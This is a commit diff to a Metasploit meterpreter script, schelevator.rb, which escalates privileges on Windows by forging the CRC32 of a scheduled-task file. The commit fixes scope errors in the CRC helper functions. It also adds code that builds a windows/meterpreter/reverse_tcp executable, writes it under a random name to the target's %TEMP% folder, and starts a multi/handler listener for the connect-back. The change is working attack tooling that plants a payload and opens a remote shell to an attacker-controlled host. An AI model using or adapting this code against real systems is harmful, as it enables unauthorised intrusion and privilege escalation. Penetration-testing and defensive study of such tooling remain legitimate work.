Fix errors with ESET and bwd_table not defined, and add the ability to automatically generate a reverse meterpreter payload.

git-svn-id: file:///home/svn/framework3/trunk@11152 4d416f70-5f16-0410-b530-b9f4589650da

scripts/meterpreter/schelevator.rb

@@ -58,6 +58,8 @@ end
 	"-h" => [ false, "Help menu." ],
 	"-c" => [ true, "Execute the specified command" ],
 	"-u" => [ true, "Upload and execute the specified file" ],
+	"-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
+	"-p" => [ true, "The port on the remote host where Metasploit is listening"],
 	"-t" => [ true, "Use the specified task name" ]
 )
 
@@ -67,6 +69,8 @@ def usage
 	raise Rex::Script::Completed
 end
 
+rhost = Rex::Socket.source_address
+rport = 4444
 taskname = nil
 cmd = nil
 upload_fn = nil
@@ -88,14 +92,45 @@ upload_fn = nil
 	when "-h"
 		usage
 
+	when "-r"
+		rhost = val
+
+	when "-p"
+		rport = val.to_i
 	end
 }
 
 # Must have at least one of -c or -u
 if not cmd and not upload_fn
-	print_error("You must specify -c or -u")
-	print_line('')
-	usage
+	print_status("Using default reverse-connect meterpreter payload; -c or -u not specified")
+
+	# Get the exe payload.
+	pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
+	pay.datastore['LHOST'] = rhost
+	pay.datastore['LPORT'] = rport
+	raw  = pay.generate
+	exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
+	#and placing it on the target in %TEMP%
+	tempdir = client.fs.file.expand_path("%TEMP%")
+	tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
+	cmd = tempdir + "\\" + tempexename + ".exe"
+	print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{cmd}")
+	fd = client.fs.file.new(cmd, "wb")
+	fd.write(exe)
+	fd.close
+
+	#get handler to be ready
+	handler = client.framework.exploits.create("multi/handler")
+	handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
+	handler.datastore['LHOST']   = rhost
+	handler.datastore['LPORT']   = rport
+	handler.datastore['InitialAutoRunScript'] = "migrate -f"
+	handler.datastore['ExitOnSession'] = false
+	#start a handler to be ready
+	handler.exploit_simple(
+		'Payload'	=> handler.datastore['PAYLOAD'],
+		'RunAsJob'       => true
+	)
 end
 
 if cmd
@@ -133,12 +168,21 @@ if upload_fn
 	cmd ||= location
 end
 
+def crc32(data)
+	table = Zlib.crc_table
+	crc = 0xffffffff
+	data.unpack('C*').each { |b|
+		crc = table[(crc & 0xff) ^ b] ^ (crc >> 8)
+	}
+	crc
+end
 
-#
-# CRC32 stuff from ESET (presumably reversed from Stuxnet, which was presumably
-# reversed from Microsoft's code)
-#
-bwd_table = [
+def fix_crc32(data, old_crc)
+	#
+	# CRC32 stuff from ESET (presumably reversed from Stuxnet, which was presumably
+	# reversed from Microsoft's code)
+	#
+	bwd_table = [
 		0x00000000, 0xDB710641, 0x6D930AC3, 0xB6E20C82,
 		0xDB261586, 0x005713C7, 0xB6B51F45, 0x6DC41904,
 		0x6D3D2D4D, 0xB64C2B0C, 0x00AE278E, 0xDBDF21CF,
@@ -203,18 +247,8 @@ bwd_table = [
 		0xD4B55116, 0x0FC45757, 0xB9265BD5, 0x62575D94,
 		0x62AE69DD, 0xB9DF6F9C, 0x0F3D631E, 0xD44C655F,
 		0xB9887C5B, 0x62F97A1A, 0xD41B7698, 0x0F6A70D9
-]
+	]
 
-def crc32(data)
-	table = Zlib.crc_table
-	crc = 0xffffffff
-	data.unpack('C*').each { |b|
-		crc = table[(crc & 0xff) ^ b] ^ (crc >> 8)
-	}
-	crc
-end
-
-def fix_crc32(data, old_crc)
 	crc = crc32(data[0, data.length - 12])
 	data[-12, 4] = [crc].pack('V')
 	
@@ -288,7 +322,7 @@ end
 #
 # Record the crc32 for later calculations
 #
-old_crc32 = ESET.crc32(content)
+old_crc32 = crc32(content)
 print_status("Original CRC32: 0x%x" % old_crc32)
 
 #
@@ -315,8 +349,8 @@ content = Rex::Text.to_unicode(content)
 #
 # Fix it so the CRC matches again
 #
-ESET.fix_crc32(content, old_crc32)
-new_crc32 = ESET.crc32(content)
+fix_crc32(content, old_crc32)
+new_crc32 = crc32(content)
 print_status("Final CRC32: 0x%x" % new_crc32)
 
 #